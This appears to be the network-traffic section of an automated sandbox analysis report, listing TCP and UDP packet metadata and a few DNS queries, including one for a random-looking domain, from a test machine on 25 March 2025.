Mar 25, 2025 15:51:06.543368101 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.543389082 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.543559074 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.544914007 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.544928074 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.545005083 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.545005083 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.545023918 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.545234919 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.546806097 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.546823025 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.546947002 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.546962023 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.547086954 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.661521912 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.661549091 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.661623955 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.661660910 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.661667109 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.661695004 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.661709070 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.661709070 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.661739111 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.662029028 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704332113 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704365969 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704396963 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704444885 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704523087 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704529047 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704529047 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704540014 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704551935 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704552889 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704575062 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704579115 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704602003 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704631090 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704644918 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704673052 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704700947 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704715967 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704734087 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704746962 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704765081 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704771042 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704777956 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704803944 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704858065 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704869986 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704888105 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704893112 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704904079 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704919100 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704926014 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.704956055 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.704960108 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705010891 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705010891 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705014944 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705024958 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705051899 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705066919 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705085993 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705092907 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705120087 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705154896 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705168962 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705185890 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705192089 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705200911 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705214977 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705216885 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705224991 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705291033 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705291033 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705296040 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705310106 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705329895 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705360889 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705365896 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705377102 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705391884 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705394983 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705425978 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705430031 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705455065 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705461979 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705481052 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705513000 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705530882 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705538988 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705538988 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705545902 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705571890 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705610991 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705626011 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705642939 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705647945 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705671072 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705672979 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705692053 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705698967 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705703020 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705724001 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705760002 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705774069 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705790043 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705795050 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.705822945 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.705822945 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.706820965 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.719161987 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.878279924 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.878309965 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.878400087 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.878451109 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.878483057 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.878499985 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.878547907 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.878561974 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.878959894 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.879024982 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879112959 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879127979 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879147053 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879158020 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.879173040 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879190922 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879190922 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.879219055 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879240036 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879266024 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.879266977 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879290104 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879306078 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879331112 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879339933 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.879359961 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:06.879395008 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.879395008 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.879532099 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.880908012 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.880908012 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.934834957 CET	49727	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:06.934910059 CET	443	49727	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:07.334825039 CET	49671	443	192.168.2.4	204.79.197.203
Mar 25, 2025 15:51:07.603672981 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:07.603714943 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:07.604646921 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:07.605173111 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:07.605190992 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:07.810233116 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:07.810712099 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:07.812115908 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:07.812124968 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:07.812413931 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:07.812711954 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:07.856276989 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:07.998933077 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.010979891 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.011013985 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.011372089 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.011394024 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.011518955 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.034257889 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.034291029 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.035662889 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.035721064 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.035731077 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.078252077 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.110403061 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.110434055 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.112309933 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.112309933 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.112330914 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.113665104 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.123066902 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.123085022 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.123987913 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.124047995 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.124057055 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.124130964 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.137017012 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.137033939 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.137828112 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.137861967 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.138118982 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.142296076 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.142380953 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.149357080 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.149883986 CET	49731	443	192.168.2.4	151.101.66.137
Mar 25, 2025 15:51:08.149905920 CET	443	49731	151.101.66.137	192.168.2.4
Mar 25, 2025 15:51:08.271626949 CET	49728	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:08.316279888 CET	443	49728	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:08.998102903 CET	443	49728	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:08.998173952 CET	443	49728	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:09.001849890 CET	49728	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:09.005088091 CET	49728	443	192.168.2.4	104.21.65.232
Mar 25, 2025 15:51:09.005105019 CET	443	49728	104.21.65.232	192.168.2.4
Mar 25, 2025 15:51:09.119187117 CET	49735	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.119232893 CET	443	49735	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.119396925 CET	49735	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.119627953 CET	49735	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.119638920 CET	443	49735	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.322384119 CET	443	49735	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.322479963 CET	49735	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.323627949 CET	49735	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.323637962 CET	443	49735	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.323869944 CET	443	49735	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.324120998 CET	49735	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.364285946 CET	443	49735	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.544006109 CET	443	49735	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.544063091 CET	443	49735	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.548271894 CET	443	49735	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.555767059 CET	49735	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.556941032 CET	49735	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.556961060 CET	443	49735	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.558609962 CET	49736	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.558656931 CET	443	49736	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.571995020 CET	49736	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.572386026 CET	49736	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.572412014 CET	443	49736	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.781748056 CET	443	49736	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.784730911 CET	49736	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.784763098 CET	443	49736	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:09.797847033 CET	49736	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:09.797872066 CET	443	49736	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:10.142158031 CET	443	49736	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:10.142235994 CET	443	49736	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:10.142532110 CET	49736	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:10.142566919 CET	443	49736	35.190.80.1	192.168.2.4
Mar 25, 2025 15:51:10.142626047 CET	49736	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:10.142652988 CET	49736	443	192.168.2.4	35.190.80.1
Mar 25, 2025 15:51:11.468149900 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 15:51:11.775217056 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 15:51:11.804975033 CET	49709	443	192.168.2.4	131.253.33.254
Mar 25, 2025 15:51:11.805393934 CET	49709	443	192.168.2.4	131.253.33.254
Mar 25, 2025 15:51:11.805393934 CET	49709	443	192.168.2.4	131.253.33.254
Mar 25, 2025 15:51:11.908129930 CET	443	49709	131.253.33.254	192.168.2.4
Mar 25, 2025 15:51:11.908571005 CET	443	49709	131.253.33.254	192.168.2.4
Mar 25, 2025 15:51:11.908911943 CET	49738	443	192.168.2.4	131.253.33.254
Mar 25, 2025 15:51:11.908946037 CET	443	49738	131.253.33.254	192.168.2.4
Mar 25, 2025 15:51:11.908976078 CET	443	49709	131.253.33.254	192.168.2.4
Mar 25, 2025 15:51:11.909265041 CET	49738	443	192.168.2.4	131.253.33.254
Mar 25, 2025 15:51:11.909729958 CET	49738	443	192.168.2.4	131.253.33.254
Mar 25, 2025 15:51:11.909745932 CET	443	49738	131.253.33.254	192.168.2.4
Mar 25, 2025 15:51:12.243905067 CET	443	49738	131.253.33.254	192.168.2.4
Mar 25, 2025 15:51:12.244060993 CET	49738	443	192.168.2.4	131.253.33.254
Mar 25, 2025 15:51:12.252281904 CET	49740	80	192.168.2.4	142.250.65.195
Mar 25, 2025 15:51:12.348309994 CET	80	49740	142.250.65.195	192.168.2.4
Mar 25, 2025 15:51:12.348409891 CET	49740	80	192.168.2.4	142.250.65.195
Mar 25, 2025 15:51:12.348560095 CET	49740	80	192.168.2.4	142.250.65.195
Mar 25, 2025 15:51:12.397527933 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 15:51:12.441255093 CET	80	49740	142.250.65.195	192.168.2.4
Mar 25, 2025 15:51:12.442554951 CET	80	49740	142.250.65.195	192.168.2.4
Mar 25, 2025 15:51:12.449342012 CET	49740	80	192.168.2.4	142.250.65.195
Mar 25, 2025 15:51:12.545567036 CET	80	49740	142.250.65.195	192.168.2.4
Mar 25, 2025 15:51:12.596038103 CET	49740	80	192.168.2.4	142.250.65.195
Mar 25, 2025 15:51:13.604020119 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 15:51:14.399804115 CET	443	49725	142.251.32.100	192.168.2.4
Mar 25, 2025 15:51:14.399882078 CET	443	49725	142.251.32.100	192.168.2.4
Mar 25, 2025 15:51:14.404046059 CET	49725	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:51:16.009012938 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 15:51:16.081657887 CET	49725	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:51:16.081686974 CET	443	49725	142.251.32.100	192.168.2.4
Mar 25, 2025 15:51:16.096271038 CET	49678	443	192.168.2.4	20.189.173.27
Mar 25, 2025 15:51:20.814799070 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 15:51:30.420586109 CET	49681	80	192.168.2.4	2.17.190.73
Mar 25, 2025 15:52:04.152834892 CET	49747	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:52:04.152929068 CET	443	49747	142.251.32.100	192.168.2.4
Mar 25, 2025 15:52:04.153031111 CET	49747	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:52:04.153580904 CET	49747	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:52:04.153616905 CET	443	49747	142.251.32.100	192.168.2.4
Mar 25, 2025 15:52:04.373063087 CET	443	49747	142.251.32.100	192.168.2.4
Mar 25, 2025 15:52:04.374154091 CET	49747	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:52:04.374217987 CET	443	49747	142.251.32.100	192.168.2.4
Mar 25, 2025 15:52:12.858304977 CET	49740	80	192.168.2.4	142.250.65.195
Mar 25, 2025 15:52:12.954659939 CET	80	49740	142.250.65.195	192.168.2.4
Mar 25, 2025 15:52:12.954725981 CET	49740	80	192.168.2.4	142.250.65.195
Mar 25, 2025 15:52:14.382627964 CET	443	49747	142.251.32.100	192.168.2.4
Mar 25, 2025 15:52:14.382771969 CET	443	49747	142.251.32.100	192.168.2.4
Mar 25, 2025 15:52:14.382908106 CET	49747	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:52:16.079451084 CET	49747	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:52:16.079519033 CET	443	49747	142.251.32.100	192.168.2.4
Mar 25, 2025 15:52:43.310969114 CET	49708	443	192.168.2.4	52.113.196.254
Mar 25, 2025 15:53:04.203381062 CET	49761	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:53:04.203437090 CET	443	49761	142.251.32.100	192.168.2.4
Mar 25, 2025 15:53:04.203617096 CET	49761	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:53:04.203809977 CET	49761	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:53:04.203829050 CET	443	49761	142.251.32.100	192.168.2.4
Mar 25, 2025 15:53:04.414383888 CET	443	49761	142.251.32.100	192.168.2.4
Mar 25, 2025 15:53:04.414805889 CET	49761	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:53:04.414865017 CET	443	49761	142.251.32.100	192.168.2.4
Mar 25, 2025 15:53:14.421439886 CET	443	49761	142.251.32.100	192.168.2.4
Mar 25, 2025 15:53:14.421498060 CET	443	49761	142.251.32.100	192.168.2.4
Mar 25, 2025 15:53:14.421669960 CET	49761	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:53:14.452332020 CET	49761	443	192.168.2.4	142.251.32.100
Mar 25, 2025 15:53:14.452362061 CET	443	49761	142.251.32.100	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 25, 2025 15:50:59.988755941 CET	53	65214	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:00.003540993 CET	53	57556	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:00.845824957 CET	53	53669	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:01.013586044 CET	53	50881	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:04.081290007 CET	60951	53	192.168.2.4	1.1.1.1
Mar 25, 2025 15:51:04.081701040 CET	63624	53	192.168.2.4	1.1.1.1
Mar 25, 2025 15:51:04.187426090 CET	53	60951	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:04.188158035 CET	53	63624	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:04.912697077 CET	50385	53	192.168.2.4	1.1.1.1
Mar 25, 2025 15:51:04.916390896 CET	63494	53	192.168.2.4	1.1.1.1
Mar 25, 2025 15:51:05.147239923 CET	53	50385	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:05.184637070 CET	53	63494	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:07.460761070 CET	65068	53	192.168.2.4	1.1.1.1
Mar 25, 2025 15:51:07.461078882 CET	61155	53	192.168.2.4	1.1.1.1
Mar 25, 2025 15:51:07.569699049 CET	53	65068	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:08.359059095 CET	53	49722	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:09.003334045 CET	56738	53	192.168.2.4	1.1.1.1
Mar 25, 2025 15:51:09.003509045 CET	61867	53	192.168.2.4	1.1.1.1
Mar 25, 2025 15:51:09.104998112 CET	53	56738	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:09.106049061 CET	53	61867	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:18.027389050 CET	53	63380	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:36.837867975 CET	53	56625	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:57.092596054 CET	138	138	192.168.2.4	192.168.2.255
Mar 25, 2025 15:51:59.393034935 CET	53	61425	1.1.1.1	192.168.2.4
Mar 25, 2025 15:51:59.920919895 CET	53	49163	1.1.1.1	192.168.2.4
Mar 25, 2025 15:52:02.565135002 CET	53	50141	1.1.1.1	192.168.2.4
Mar 25, 2025 15:52:29.778611898 CET	53	64680	1.1.1.1	192.168.2.4
Mar 25, 2025 15:53:14.558737040 CET	53	52753	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 25, 2025 15:51:04.081290007 CET	192.168.2.4	1.1.1.1	0x296b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 15:51:04.081701040 CET	192.168.2.4	1.1.1.1	0x203	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 25, 2025 15:51:04.912697077 CET	192.168.2.4	1.1.1.1	0x7038	Standard query (0)	zak9.rnltvipi.es	A (IP address)	IN (0x0001)	false
Mar 25, 2025 15:51:04.916390896 CET	192.168.2.4	1.1.1.1	0xc2d3	Standard query (0)	zak9.rnltvipi.es	65	IN (0x0001)	false
Mar 25, 2025 15:51:07.460761070 CET	192.168.2.4	1.1.1.1	0xc450	Standard query (0)	code.jquery.com	A (IP address)	IN (0x0001)	false
Mar 25, 2025 15:51:07.461078882 CET	192.168.2.4	1.1.1.1	0xbb43	Standard query (0)	code.jquery.com	65	IN (0x0001)	false
